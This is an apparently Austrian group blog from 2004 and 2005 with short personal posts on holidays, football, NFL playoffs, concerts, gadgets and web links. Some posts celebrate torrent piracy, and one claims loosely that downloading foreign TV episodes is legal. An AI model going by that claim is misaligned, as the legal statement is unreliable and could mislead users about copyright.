zwar einen tag frueher als geplant - trotzdem relaxed und erholt. lots of pizza, sun, pool & beach. den kids hats ebenso gefalln, dem kleinen wie der grossen.

so schoen es dort ist, 3 jahre die selbe destination sind fuers erste mal genug - naechstes jahr wirds wahrscheinlich hellas via plane.
:: LOUNGE FM  bully  23.06.2005 19:46:47

Mit heutigem Datum startet in Österreich der erste UKW-unabhängige Radiosender.

Lounge FM beginnt sein Programm um 21.00 Uhr und ist nur via UMTS am Handy empfangbar.
time out  sTe  10.06.2005 16:38:29


einem spontanentschluss zufolge verabschieden wir uns in den urlaub richtung bella italia.
roll over...  sTe  08.06.2005 23:18:56
beethoven, symphonien, komplett und ganz legal
Oiso mir gfoit des a sehr...  sTe  08.06.2005 15:41:56
Oiso mir gfoits!  romario11  08.06.2005 14:43:35
tuning  sTe  05.06.2005 05:51:18
mein digitaler videorecorder ist nun fast perfekt:
aufnehmen ist jetzt vom band befreit, müehsames schneiden (nicht dass ich mir das je angetan haette...) sowieso kein thema mehr;
ausserdem kann man endlich alle alten vhs auf scheibe brennen - wer also noch raritaeten hat - lets xvid´em

PS: der erste versuch war nano: „Die violette Erfolgsgeschichte“ - auf ein gutes omen
:: WHAT A WEEKEND  bully  31.05.2005 04:19:52

Riegersburg, Südsteiermark. 26. bis 29. Mai 2005

Sally, Doris, Franca, Livia, Romario, Hons und Bully

Bockhenderl, Meisterplatte, Grillage, Schnitzerl, Kernöl auf diversen Salaten, Stiegl und Murauer, Golden Delicious - Schnaps und verschiedene Weine

Baden, Feiern, Koatln, Entspannen...

FOTOS

We´ll be back, that´s for sure!!!

...und danke an den Wettergott, die Familie Amtmann und alle Mitreisenden!!!

FEIN WOA´S!!!!
leisure  sTe  25.05.2005 19:06:03

allen die freihaben ein wunderschoenes verl. wochenende...wir muessens leider vorziehen...
eye color  sTe  22.05.2005 01:23:35
What Color Eyes Would Your Children Have?
skinny  sTe  21.05.2005 02:49:24
best winamp skin ever (mmn) in personal environment
funny fox  sTe  13.05.2005 23:09:09
great firefox commercials
PVC soweit das Auge reicht  babsi  11.05.2005 02:15:15
Ein Aprilscherz? Leider nein: In Andermatt wird ernsthaft ein Gletscher in PVC-Folie gepackt, weil das starke Abschmelzen den Skibetrieb nahezu verhindert. Die Tiroler haben sich auch gleich für die Umsetzung dieser genialen Idee angemeldet. *kopfschüttel*
:: AUSTRIA SALZBURG NEU  bully  10.05.2005 20:17:41

Unsere Mannschaft für nächstes Jahr nimmt schön langsam Konturen an. Ich möchte hier mal die Neuerwerbungen vorstellen und auch die Gerüchteküche etwas analysieren:

FIX:
Roland Kirchler (35)
nicht mehr der jüngste aber bestimmt eine Verstärkung, zumindest für eine Saison
Patrik Jezek (28)
wenn er zu alter (tiroler) Stärke aufschliessen kann, eine echte Bereicherung
Christian Mayrleb (32)
sorry, aber den Moarli brauch i echt ned!!!!!
Thomas Linke (35)
zur Stabilisierung der Abwehr bestimmt recht hilfreich; für eine Saison sicher wichtig, auch wenn er mir als Schalker definitiv viel sympatischer war (als als Bayer // was für Eltern muss man haben...)
Christoph Jank (31)
hat verlängert und ich bin froh darüber ;-)

GERÜCHTE:
Martin Pieckenhagen (33), kommt zu 75%
ein sehr guter Tormann, keine Frage! wohl nicht so gut wie der Manninger; is mir aber immernoch viel lieber als der Macho!
Alexander Zickler (31), 60%
schnell und abschlussstark, aber sehr oft verletzt...
Vahid Hashemian (29) 20%
den hätt ich echt gern; Ex-Bochumer, der sich bei den Bayern eigentlich nie richtig durchsetzen konnte. Trick- und einfallsreicher wendiger Stürmer; wird aber wohl leider in Deutschland bleiben...

diese Liste wird natürlich kontinuierlich ergänzt und aktualisiert.
fenstertag  sTe  07.05.2005 05:52:41
13 min taxifahrt reichen definitv nicht aus um einer indischen person (fahrer) die gepflogenheit eines ´fenstertages´ zu erklaeren.
was es ist hat er gleich begriffen (ein arbeitstag zw 2 freien), aber das wirkliche warum und vor allem dass gleich das gesamte öffentliche leben davon betroffen ist nicht :) ich musste ihn unglaeubig weiterfahren lassen...
mobile  sTe  03.05.2005 18:57:35


mobiler regieplatz fuer das kommende event nächste woche...
award  sTe  02.05.2005 23:30:46
weils heut so schön ist und wir nicht nur meckern wollen präsentieren wir den ersten feelosophee support award: ausgezeichnet wird "herr INGO" von upc.
nicht nur dass er licht ins abstruse dunkel des help desks bezueglich der premiere pakete und den jeweiligen teaser angeboten gebracht hat - nein er veranlasste auch eine reduktion der downgrade gebuehr von chello plus auf classic von €70 auf €8,7. vielen dank.
email kontakt gibts auf anfrage :)
alles wieder gut,  sTe  29.04.2005 20:44:03


und schoener als zuvor - sauber und geputzt, vielleicht sollt ich nicht wieder 5 jahre warten :)
:: HURRAAAAAAAA!!!!!!!!  bully  23.04.2005 05:41:08



DEUTSCHLAND WIR KOMMEN !!!!!!

am 27. Juni 2006!!!!!
Sieger F : Zweiter E !!!
ugly  sTe  22.04.2005 01:16:57
werbegeschenke sind teilweise echt EINFACH NUR entsetzlich unansehnlich.
wir sind doch kein bestattungsunternehmen!










chef´s suggestion  sTe  21.04.2005 03:58:35






feature  sTe  21.04.2005 01:31:06
fuer alle die sich gewundert haben was das plus neben jeder topic headline zu bedeuten hat, folgendes:
dies ist der direkte link zu dem einzelnen topic mit mitlerweile advanced posting features - but check out by yourself
crash  sTe  19.04.2005 17:11:55
das passiert wenn ein 83 jaehriger mit centimeterdicken brillen eine stoptafel missachtet und mich abschiesst :(
niemand verletzt - car pretty damaged!

UPDATE: car will be completely restored!
:: Liebe Glücksgöttin, lieber Fussballgott!!!  bully  14.04.2005 20:53:51

Falls es euch gibt, bitten wir euch uns bei der morgigen Verlosung der Tickets für die Fussball-WM im Lande der Deutschen wohlgesonnen zu sein und uns zumindest ein Spiel, wenn möglich aber ganz viele zu bescheren!

Als Freunde und Verehrer der Sportart Fussball haben wir uns Eintrittskarten für diese Veranstaltung durchaus verdient!

Seid gnädig und unterstützet unser Ansinnen!

BIIIIIIIIITTE!!!


PS: Falls es diesmal noch nix wird, geht´s am 1. Mai 2005 um 00:00:01 Uhr um Speed:
Bei der zweiten Phase (1. Mai bis 15. November) gilt ebenso wie bei der vierten (1. Februar bis 15. April 2006) die zeitliche Priorität des Eingangs der Bestellung. Nach der dritten Verkaufsphase (1. Dezember bis 15. Januar 2006) wird wieder ausgelost. Vom 1. Mai 2006 bis zum Endspiel am 9. Juli 2006 gibt es noch einen "Last-Minute"-Verkauf.
:: NICE PICTURE, LOOKS PROMISING!!!  bully  07.04.2005 20:25:55




Es ist wirklich schon einige Jahre her, dass das Lesen des Sportteils der Salzburger Nachrichten soooo viel Freude gemacht hat wie in den letzten beiden Tagen (08.04. und 09.04.)!!! WOW!!!!
broken  sTe  04.04.2005 23:23:17
das ging aber verdammt schnell mit der website: bzoe
fpoe hingegen is down :)
: Ei, Ei, Ei  bully  03.04.2005 18:42:45

wer mehr über sein ganz persönliches ei im kühlschrank wissen will, informiere sich bitteschön hier!!!
(inkl. bilder des jeweiligen hofes und der hennen ;)) )
vespa  sTe  01.04.2005 18:47:43
als alternativ honorar eines kunden koennte ich eventuell bald eine 40 jahre alte vespa gs160 mein eigen nennen :)

is zwar keine superduke aber vielmehr back to the roots und das mit stil...

i cross my fingers and knock on wood!

PS: hat eventuell noch wer aus unseren alten vespa gang zeiten ein paar photos zum einscannen?
virus  sTe  31.03.2005 17:05:49
...wenn man sich ende maerz noch die letzten grippe viren einfaengt is das echt scheisse :(
Water for Life  sTe  22.03.2005 19:22:47
Der 22. März wurde von den Vereinten Nationen zum Tag des Wassers erklärt. An diesem Tag soll jedes Jahr durch gezielte Aktivitäten besonders auf die Bedeutung des Wassers, den Schutz der Wasservorkommen und deren nachhaltige Nutzung aufmerksam gemacht werden.
:: STRAMPLER  bully  21.03.2005 23:03:51
okok, ich geb zu etwas aussergewöhnlich...
aber für einige ja doch interessant ;-)

coole strampler und leiberl für babys / kleinkinder gibts hier:
BABYWIT
INFECTIOUS THREADS

die shipping costs sind einmal $13.50 und einmal $14.00. bei dem derzeit niedrigen dollar recht erträglich, wie ich finde.

werd bestimmt was bestellen, vielleicht will sich ja wer anschliessen (sammelbestellung ;-) )
990 Superduke - Super Bike!  romario11  19.03.2005 03:10:33
Ich war eigentlich noch nie der große KTM Fan, aber jetzt haben die Burschen es geschafft. 990 Superduke, hmmm.

Das ist genau das richtige für frisch gebackene Väter und solche, die es noch werden wollen. Womit mans hier zu tun hat, zeigt auf eindrucksvolle Weise das KTM PR-Filmchen, das es hier zu sehen gibt. Nicht gerade ein Signal an die Vernunft - aber dafür umso mehr an den Spaßteil des verdammten Gehirns!!

Speed me up Scotti...
Welcome to our world  babsi & sTe & mia  17.03.2005 02:48:39
::   bully  13.03.2005 02:43:44


dembones  sTe  10.03.2005 22:41:19
check out this phantastic choreography: dembones done by a freaky clan @ a lan party playing world of warcraft.
full size here
garage rock  sTe  06.03.2005 06:41:42
schon wieder eine lo-fi retro band?! YES DEFINITLY! - sorry, White Stripes, DAgegen wirkt ihr wie eine ministranten combo:
THE KILLS.
In angeblich nur 47 tagen eingespielt (vom writing bis mastern) mit einer abgefuckten gitarre, einem verzerrten bass, drums und sensationellen vocals zelebriert das gemischte duo die essenz des rock’n’roll: ungeschliffen, dreckig, nackt und scheisscool !!!

video: The Good Ones
"Keep on Your Mean Side" (2003)
"No Wow" (2005)
:: In 80 Stunden um die Welt  bully  02.03.2005 20:49:35

Steve Fossett is wiedermal unterwegs...

gaaaaanz allein...

über den Wolken...

nähere Infos gibts HIER!

LIVE TRACKING
wanna buy a car?  sTe  26.02.2005 18:34:10
current project: family & friends day
386k  sTe  24.02.2005 02:43:14
whatismyip.com has been sold via ebay for US $386,100.00 :(
tvtv  sTe  19.02.2005 16:09:29
downloading popular tv shows has increased by 150% in the last year. a typical episode of 24 was downloaded by about 100,000 people globally, estimated 60,000 times from europeans. after each episode of 24 screens at 21:00(EST) in the US, copies have been circulating online by 22:20(EST). reasons are simple: people dont want to wait months for local broadcasting, and people dont want to see commercials. additional the quality is superb due to the hdtv standard, which will last ages till it will swash to europe.

The top 10 pirated TV shows worldwide are:
1. 24
2. Stargate Atlantis
3. The Simpsons
4. Enterprise
5. Stargate SG-1
6. The O.C.
7. Smallville
8. Desperate Housewives
9. Battlestar Galactica
10. Lost

and it seems its not illegal to download a show aired in a different country if it´s not been aired in yours yet and has not been released on dvd.
mini  sTe  16.02.2005 21:47:14
shiny new mac arrived @ 14:10 CET;
pluged in und performed - impressing!
street  sTe  11.02.2005 01:55:10
Wiener Straßennamen und ihre historische Bedeutung
feelofood preview 2  sTe  10.02.2005 03:40:52
due due lack of time, the release has been a little bit delayed.
sneak peak @ food.feelosophee.com
zzz rai  sTe  10.02.2005 00:16:00
some links  sTe  04.02.2005 02:07:28
current work: attensam
some commercials: gti, polo, ka
ps: one night for asia has reached €50.000
coming soon...  sTe  03.02.2005 00:36:21
:: SUPERBOWL XXXIX  bully  01.02.2005 20:34:36



06.02.2005; Jacksonville, Florida
Alltel Stadium:



Wegen akuten Zeitmangels kann ich heuer nur mit einer kurzen Vorschau dienen, sorry.
Die Eagles sind das erste Mal seit 1981 in der Superbowl, die Patriots zum dritten Mal in vier Jahren. -> Erfahrung und Routine: klares Plus für die Patriots, sie sind gewohnt mit dieser Situation umzugehen.
Die Abwehr der Patriots ist die Beste der Liga; Widerspruch wird hier nicht geduldet. Die Eagles Defense ist stark aber weit von der der Patriots entfernt.
Ad Coaching: Bill Belichick (Patriots) ist der einfallsreichste und raffinierteste Coach der Liga, Andy Reid (Eagles) ist gut aber nicht gut genug!
Offense: Patriots-QB Tom Brady´s Grossmutter starb am Dienstag, er scheint dies aber gut zu verkraften ("I´m sure she´ll be looking down on us Sunday. That´s one more person up there who will be cheering for us."). TO sollte bei den Eagles einsatzfähig sein, was den Eagles einen Pluspunkt bezüglich der Offense beschert.
Special Teams: leichter Vorteil bei den Patriots, aber fast ausgeglichen.

TIPP:
PATRIOTS mit mehr als 10 Punkten Unterschied
(wird aber trotzdem eine Klassepartie)

Preview-Links:
Superbowl.com
Jacksonville
Foxsports.com
FirstCoastNews
Peter King
The Virtual Library of Sport
Sports Illustrated
The Times
AOL
Yahoo
Sport1

New England Patriots - Philadelphia Eagles

24 - 21



Superbowl-MVP Deion Branch mit der Vince Lombardi Trophy


11 Catches von Deion Branch, unwiderstehliches Running Game von Corey Dillon, perfekter Gameplan von Bill Belichick und ein Quarterback Tom Brady, der eindeutig fehlerunanfälliger war als sein gegenüber waren gestern Abend ausschlaggebend für den Sieg der New England Patriots in der Superbowl XXXIX!
Die Patriots gingen als verdienter Sieger vom Platz, wenn die Eagles auch die Partie länger als erwartet spannend halten konnten (bis 8 Sekunden vor Schluß).

Congratz Patriots!!!

Aber auch:
Congratz Bill Belichick und Tom Brady!!! -->>>
9 Siege in 9 Playoff-Spielen - OUTSTANDING PERFORMANCE!!!!!!!!!

Jimmy Johnson, TV-Experte für American Football und Anfang der neunziger Jahre als Headcoach der Dallas Cowboys für zwei Superbowl-Siege verantwortlich, nannte Belichick gestern den "vielleicht besten Coach der Football-Historie". Große Worte, aber sicher nicht ganz unberechtigt!
latest online work  sTe  28.01.2005 16:25:31
snow  sTe  26.01.2005 16:20:59
jahrelang hab ichs mir angeschaut, und es wird immer schlimmer: sobald die erste flocke faellt, kippt bei den wiener autofahreren ein schalter, der sie in die vorschule zurueckversetzt.
daher schlage ich vor: jeder autofahrer muss in wien, sobald es schneit, eine geburtsurkunde mitfuehren, und wenn da wien draufsteht dann sofort schluessel abnehmen.
ja ich weiss es gibt ausnahmen, aber die halten sich in grenzen. fuer alle die sich anbatzeln und trotzdem glauben sie muessen fahren: bitte lesen !!!!
mini  sTe  24.01.2005 23:19:42
lang hats gedauert, aber jetzt ist passiert: soeben diese butterdose bestellt...
:-))  bully  21.01.2005 17:24:54

Trottln gibts scho auf derana Wööd!!! :-)))
burgenländische Matura
coffee, anyone?
City Darts
(beim ersten mal: note 5, 2382km daneben)
l!ghter  sTe  20.01.2005 19:30:31
come on baby light my fire...
Vienna Autoshow 2005  sTe  19.01.2005 22:46:34
first exclusive pics from the vienna autoshow
:: The Power...  bully  19.01.2005 22:09:31


... of a 2,5 Gigapixel - Image!
eXeem  sTe  19.01.2005 17:12:18
eXeem, the P2P-based BitTorrent distribution program, is likely to be released for the first time within the next week, Neowin understands. In a notice on the homepage of the former Suprnova torrents site, the program´s creators say the first public beta is due for release this week.
upset  sTe  19.01.2005 05:32:10
traurig aber wahr - so far kein einziger comment in 2005;
moegen die topics auch nicht DIE reisser sein, aber so wenig response ist doch unerwartet ...
also jetzt kann jeder schreiben warum er nix postet..(i can face it).
bin schon gespannt OB was kommt
ski challenge  sTe  18.01.2005 01:29:50
very addictive: ski challenge
my current time: 2:03:59 01:59.261 damit immerhin schon auf platz 2962 (freaks!!!)
One Night For Asia Review  sTe  16.01.2005 06:51:15
mit einer spendensumme von mehr als 35.000,- € war ´One Night For Asia´ ein voller erfolg;
lustig wars, fanden wir - wie die hoffentlich rund 1300 anderen gaeste auch,...
impressionen gibts selbstredend hier: (personal pics: gallery #5)
FEELOFAVS 2004 top 15  sTe  12.01.2005 06:27:38
here they are...blame for free

Scissor Sisters - Laura
Jet - Look What You,Ve Done
Scissor Sisters - Comfortably Numb
Feist - One Evening
Deus - If You Don´t Get What You Want
Soulwax - Any Minute Now
Courtney Love - Americas´s Sweatheart
Lucky Jim - You Stole My Heart Away
Cypress Hill - What´s Your Number
Green Day - American Idiot
Sportfreunde Stiller - Ich Roque
School Of Rock - It´s A Long Way To The Top
The Hives - Walk Idiot Walk
Beck - Everybody´s Gotta Learn Sometimes
Snow Patrol - Run
tones mobile  sTe  12.01.2005 00:01:18
Freeloader is a mobile ringtone service emulating internet-based collaborative models for creation and distribution. It facilitates the personal creation of ringtones and sharing them with others in the community through a standard WAP interface; bypassing the premium-rate services, walled gardens, or the need for special cables or bluetooth to enable direct phone-to-computer links.
:: THE NFL ON FEELOSPORT  bully  05.01.2005 00:20:03

Schon wieder ist der Jänner da, und die reguläre NFL-Saison wurde beendet. Bevor ich mich an einen Ausblick auf die Play-Offs und die heissesten Kandidaten für die Superbowl mache noch ein Resumee der eben erst vergangenen Saison mit persönlichen Kommentaren und den größten Überraschungen (sowohl positiv alsauch negativ).

Zuerst der unvermeidliche Blick auf die Lions:
Einem guten Beginn (vier Siege in den ersten sechs Spielen und die ersten Auswärtssiege seit drei Jahren) folgte eine fünf Spiele dauernde Niederlagenserie. Nie war es wohl so einfach in die Post-Season zu kommen wie heuer, aber einige sehr knappe und vor allem dumme Niederlagen hätten halt vermieden werden müssen. So endete die Saison mit 6 Siegen und 10 Niederlagen und wieder nur der Hoffnung aufs nächste Jahr. Zwei Faktoren, die dringend geändert werden müssen: neuer Quarterback und neuer Head-Coach!!!

Die Überraschungen der Saison:

die Negativen:
49ers:
TO is weg und nix geht mehr… 2 läppische Siege in der ganzen Saison (14 Niederlagen) und damit eindeutig das schlechteste Team der Liga. Vor zwei Jahren gewannen Sie Ihre Division noch klar und kämpften um den Einzug in die Superbowl. Heute ist diese unendlich weit entfernt!!!
Bucs:
Der Abstieg der Bucs ist fast noch gravierender als der der 49ers. Eben noch Superbowl-Gewinner (2003), jetzt Letzte der NFC South. Da ging wirklich sehr viel schief heuer.
Dolphins:
Bei den Dolphins rennt gar nix mehr, vor allem weil Ricky Williams nimma rennt. Nur vier Siege sind eindeutig zu wenig für die Fin-Fans.

die Positiven:
Steelers:
OK, die Steelers waren hoch eingeschätzt, wie man sieht auch zu Recht, aber dass Sie nach dem Grunddurchgang das stärkste Team der Liga stellen hat wohl keiner gedacht. 15 Siege in 16 Spielen sprechen eine eindeutige Sprache. Besonders der Rookie-QB Ben Roethlisberger bestach mit Ruhe, Übersicht, Geschwindigkeit und Ballgefühl.
Eagles:
So viele Jahre an der Spitze der Liga mitzumischen ist a) sehr selten und deshalb b) auf jeden Fall erwähnenswert!!!
Chargers:
Dass die Chargers heuer in die PlayOffs kommen, haben wohl ihre eigenen Fans nicht erwartet. Great Football, guys!!!

Hier die für die Play-Offs maßgebliche Reihung der beiden Conferences:

NFC:
1. Philadelphia Eagles (13-3)
2. Atlanta Falcons (11-5)
3. Green Bay Packers (10-6)
4. Seattle Seahawks (9-7)
5. St. Louis Rams (8-8)
6. Minnesota Vikings (8-8)

AFC: :
1. Pittsburgh Steelers (15-1)
2. New England Patriots (14-2)
3. Indianapolis Colts (12-4)
4. San Diego Chargers (12-4)
5. New York Jets (10-6)
6. Denver Broncos (10-6)

Nun die Vorschau auf das, was noch kommt. Dieses Wochenende haben wie immer die besten zwei Teams pro Conference spielfrei; das Wildcard-Weekend steht an:

Samstag Nacht:
22:30 Uhr, NFC: St. Louis (8-8) @ Seattle (9-7) 27-20
02:00 Uhr, AFC: N.Y. Jets (10-6) @ San Diego (12-4) 20-17

Sonntag Nacht:
19:00 Uhr, AFC: Denver (10-6) @ Indianapolis (12-4) 24-49
22:30 Uhr, NFC: Minnesota (8-8) @ Green Bay (10-6) 31-17



Soda, die Spreu trennt sich schön langsam vom Weizen und aus 12 Play-Off-Teams wurden 8. Für uns heisst das: Zeit für die Divisional Play-Offs, die kommendes Wochenende (15. und 16. Jänner) über die Bühne gehen werden. Quasi die Viertelfinali, und so sehen sie aus:

Samstag Nacht:
22:30 Uhr, AFC: N.Y. Jets @ Pittsburgh 17-20
02:00 Uhr, NFC: St. Louis @ Atlanta 17-47

Sonntag Nacht:
19:00 Uhr, NFC: Minnesota @ Philadelphia 14-27
22:30 Uhr, AFC: Indianapolis @ New England 3-20



Alle vier Teams, die letzte Woche spielfrei hatten (die 4 topgesetzten) haben sich also zu Hause durchgesetzt, tw. knapper als erwartet (Steelers), tw. klarer als erwartet (Patriots).
Es folgen... tatatataaaa

Die Championship Games:

Oh please, oh please. Two games played in the same state in the same afternoon with a northeastern snowstorm going on? That would be the best NFL Championship Sunday ever!



Sonntag, 23.01.2005:


21:00 Uhr: Atlanta @ Philadelphia (TW1)
10 - 27

Die letzten drei Jahre haben die Philadelphia Eagles nun jeweils im Championship Game verloren; die letzten zwei Mal sogar daheim!!! Heuer nun also der vierte Versuch in Folge in die Superbowl einzuziehen. Es wird aber auch diesmal wieder sehr schwer. Gegen Minnesota hat eine eher durchschnittliche Leistung gereicht um klar aufzusteigen. Die Defense war allerdings sehr stark, wenn man auch den Eindruck haben musste, dass Culpepper und Co. irgendwie mit angezogener Handbremse spielten. Der Gegner der Eagles, die Atlanta Falcons haben in den Divisional Playoffs überzeugt - voll und ganz. Quarterback Michael Vick ist einfach nicht in den Griff zu kriegen und immer für einen überraschenden Spielzug gut. Die Defense der Falcons ist gegenüber dem Vorjahr stark verbessert. Einen wichtigen Einfluss auf das Ergebnis wird aber auch hier wieder das Wetter spielen. Die Falcons sind einfach die Wärme gewohnt und in Philly kann´s im Jänner wirklich saukalt sein. Prognose: -7°C, icy & snow

Mein Tipp: 35-28 Eagles



0:30 Uhr: New England @ Pittsburgh (ORF1)
41 - 27

Auch in Pittsburgh sind Schnee und -10°C prognostiziert. Der Einfluss auf das Spiel sollte aber eher gering sein, da beide Teams gewohnt sind mit solchen Bedingungen umzugehen. Einen Sieger aus dieser Begegnung vorherzusagen ist fast unmöglich. Wenn Röthlisberger so spielt wie letzten Sonntag, verlieren die Steelers sicher. Zwei derartige Leistungen hintereinander sind aber eher nicht zu erwarten. Im Endeffekt treffen hier einfach zwei sehr starke Teams aufeinander, beide mit sehr einfallsreichen und sich gut auf den Gegner vorbereitenden Coaches. Beide Teams haben durchaus das Zeug im Superbowl als Sieger vom Platz zu gehen, vor allem wenn man gesehen hat wie die Steelers die ganze Saison über gespielt haben und wie die Patriots am Sonntag die Super-Offense der Colts auf unglaublichen 3 (!!!) Punkten hielt. Deshalb einfach aus dem Bauch heraus ->

Mein Tipp: 27-17 Patriots

Weitere Vorschauen:
NFL.com
Dr. Z
Sportsline
Foxsports
Frankfurter Rundschau
Premiere


PS: Super Bowl XXXIX am 06.02.2005 im Alltel Stadium, Jacksonville, Florida

ONE NIGHT FOR ASIA  sTe  04.01.2005 06:49:30
ein benefizevent:
Donnerstag 13.1.2005, 20 Uhr , Filmstadt Wien, Rosenhügelstudios, Halle 1, Speisingerstr. 121-127.

infos unter: onenightforasia.indeed.at

als mitveranstalter rufen wir zu zahlreichem kommen auf...
UPDATE: wien.orf.at
2005  sTe  01.01.2005 07:24:15
display  sTe  30.12.2004 01:45:31
als kleine entschaedigung fuer den verlust des arbeitszimmers zugunsten der new generation brachte das christkind ua diesen LCD.
desweiteren einen GBA damit ich den anschluss nicht verpasse, sowie karten fuer die EHWM
dirty harry  sTe  24.12.2004 04:13:01


thanks, you´re back!
doorplates  sTe  24.12.2004 02:13:05


two days before christmas our new doorplates have arrived - unfortunately they are the wrong color in real, actually they are kind of orange and not the photoshoped image as they were expected;
in two weeks this mistake should be expunged...

xmas wuzzelbock  sTe  22.12.2004 23:35:48

in einem dramatischen finale setzte sich das team ´bushwackers´ gegen team ´das ueberfussballmensch´ durch und gewinnt das indeed! xmas-wuzzel-turnier 2004.
RIP SuprNova  romario11  20.12.2004 20:13:01
Just after my last (and what i did not know by then - final) torrent dl, The Manchurian Candidate if you are interested, had completed and I tried to browse for new prey on SuprNova I had to notice that this wonderful site shut down for good.

This is a shame in particular since I was already looking forward to return home after X-mas and to find all those nice new DVDs which the folks would have found underneath their Cristmas trees well offered for dl on SuprNovas renowned mirror.

I know that there are other possibilities to gather video and sound and SuprNova had its own problems sometimes but ultimately SuprNova was the best choice for a lazy bastard like myself.

If anyone can refer me to other torrent sites on the web that would help to fight the turkey - this would be highly appreciated.

For now there is only one last thing left to be said: THX A MILLION SUPRNOVA!!! You guys did a great job!
:: BRATISLAVA – eine Empfehlung  bully  19.12.2004 23:15:58

4. Adventsamstag, und es war einfach nötig dem Wiener Kaufrauschwahn zu entfliehen, so machten wir uns gestern Vormittag auf in Richtung Bratislava. Und zwar bei wunderschönem Winterwetter...

Mit dem Zug wirklich keine Hexerei, in etwas mehr als einer Stunde ist man vom Südbahnhof in Bratislava Hlavná Stanica, von wo aus es in die Innenstadt (Fußgängerzone) nur knapp 10 Minuten zu Fuß sind. Die Fahrt kostet hin und retour EUR 14.- p.P. und ist wirklich sehr schön und vor allem unkompliziert.

Die lokalen Preis sind zwar keine Ostblockpreise mehr, aber immer noch sehr günstig. In einem guten Altstadtrestaurant kostet die Halbe Budweiser einen Euro und das Steak ca. 7.-.

Fotos:
z.B. Grassalkovich Palast (Sitz des Präsidenten Ivan Gasparovic), die Burg von Bratislava, Impressionen des Christkindlmarkts, ...

Es war sicherlich nicht unser letztes Mal in Bratislava!!!
music for xmas  sTe  17.12.2004 21:08:37
Zefrank’s free Carol Maker combines the fun of player-piano-style music composition and performance with the delights of controlling pixelicious animated musical elves and the joy of sending e-cards to your friends.
Cybersky  sTe  16.12.2004 02:37:49
two german geeks are trying to do for TV what Napster did for music—make it free, and litigious.
sound familiar? It should. Cybersky is proposing to do for TV programs what napster did for music a few years ago. And if successful, Cybersky could well shake up the television industry just as Napster, Kazaa and now Bitorrent — rattled the music and film worlds. bradcasters in the United States, Europe and Asia have already cause for concern. Cybersky´s potential for trading licensed programming could open up another round of court battles that have dogged file-sharing software since Napster.
Ciburski has patented software that gets around the server-overload problems that have plagued video-streaming applications in the past by taking advantage of peer-to-peer networking technology.

ps: it is expected in feb 2005
:: RIP, DIMEBAG  bully  14.12.2004 03:32:51
Cowboy From Hell going home...

As the band played its opening song Wednesday night, the man rushed across the stage and grabbed Darrell Abbott, firing several shots into his head from a Beretta 9 mm semiautomatic handgun...

Am Mittwoch dem 8.12.2004 wurde der ehemalige Gitarrist von Pantera (haben sich letztes Jahr aufgelöst) Darrel >>Dimebag<< Abbott in Columbus, Ohio während eines Konzerts mit seiner neuen Band Damageplan auf der Bühne erschossen.

Der Mörder, Nathan Gale (die Unschuldsvermutung ist hier wohl hinfällig), tötete danach noch zwei bis drei Besucher des Konzerts (Meldungen gehen auseinander) und verletzte einen Security-Angestellten schwer bevor er seiterseits von einem Polizisten erschossen wurde. Die Einvernahme aller überlebenden Konzertbesucher ist nach wie vor im Gange.

REST IN PEACE, DIMEBAG!!!

nachrufe und berichte:
laut.de
gmx
netzeitung
MTV
CNN
Phil Anselmo On Dimebag Darrell
for your health  sTe  11.12.2004 08:08:56
MIA says VITAMINS !!!
:: PUNK´S NOT DEAD!!!  bully  07.12.2004 15:04:26

Wenn´s Nocht wird über Simmering, kummt Leben in die Tot´n (Hos´n).

Montag, 6.12.2004, Wien, Gasometer, 21.00 Uhr.
Das Licht geht aus, schwarze Adler-Fahnen werden gehisst; der Startschuss zu einem Konzert der Extraklasse.
Hier kommt Alex eröffnet ein Feuerwerk an Hymnen. Die Halle ist zum Bersten voll und alle bis zu den hintersten Plätzen inklusive Balkon / ´Sitz´plätze feiern, tanzen, singen und schreien mit.

Campino, Kuddel, Breiti, Vom und Andi aka DIE TOTEN HOSEN geben wiedereinmal alles – Stagediving und Balkonkletteraktionen inklusive! Die Aufnahme von Vom – seines Zeichens Schlagzeuger – in die Schwerarbeiterregelung ist ein absolutes Muss.

Was mich persönlich sehr gefreut hat (wiedermal ein Tribut den richtigen gegenüber): I Fought The Law – schnell, geradlinig und laut. Nach einer ganzen Reihe von Zugaben endete dieser wunderschöne Konzertabend um ca. 23.20 Uhr mit You´ll Never Walk Alone, langen Ovationen und ausgiebigen Verabschiedungen.

DANKE, HOSEN!!!

Weiters noch erwähnenswert: Die Hosen stehen nach wie vor zu Ihrer vor vielen Jahren getätigten Aussage, dass Ihre Konzerte erschwinglich sein sollen und nie über DM 50.- kosten sollen.

Bilder (thx, Stevie!)
digital  sTe  06.12.2004 22:19:31
auch die missdigitalworld kommt aus südamerika...
pisa  sTe  06.12.2004 21:07:11
der pisa test zum selbermachen
cams  sTe  06.12.2004 20:48:08
this is really mesmerising: webcams recorded in sync, then placed geographically to form a world map. you can see the light ripple across the globe as the sun rises and sets.
wired tools 2004   sTe  03.12.2004 22:14:46
the coolest geek shopping list ever - 129 of the best screens, cams, phones, games and gadgets of the year
rebuild iraq  sTe  03.12.2004 01:37:44
diese woche schon 3x auf auslaendischem territorium gewesen;
nette leute, spannend...
make love not spam  sTe  27.11.2004 02:25:46
...ist das motto einer kampagne mit ddos attacken gegen spam server. initiated by lycos europe.
zumindest der clevere werbeeffekt verdient die erwaehnung.
mithilfe eines screensavers werden bekannte spam server mit requests zugemuellt und will sie so verlangsamen bzw. die provider gebuehren in die hoehe treiben.
moralisch fraglich, infrastrukturmaessig eine verschwendung, werden user zur selbstjustiz verleitet. allein das unterstreicht die ohnmacht vor dem problem spam. witzig find ichs allemal, gelungen ist die technische umsetzung des screensavers, alles in allem ists wiedermal der falsche weg (wenn auch vielleicht nicht ganz).
HL2  sTe  19.11.2004 02:29:34
it´s a masterpiece! - the most beautiful moment of game culture on PC.

alle fachzeitschriften bewerten Half Life 2 als das bestbewerteste spiel aller zeiten!

diese vorschusslorbeeren muss ich bestaetigen: wunderbare graphik, beste game physik ever, und verblueffende KI der gegner.
sorry everybody  sTe  11.11.2004 16:27:37
wow! last time i looked (yesterday) this gallery was only one page….

and IQ <-> Wahlverhalten
it´s firefox day  sTe  09.11.2004 07:29:49
einige der leser tangiert dies wenig, fuer andere ists ein segen;
wer bis dato noch nicht geswitched ist - ein letztes mal: getfirefox.com
erheiterndes für ein verregnetes wochenende  rriot  06.11.2004 02:41:20
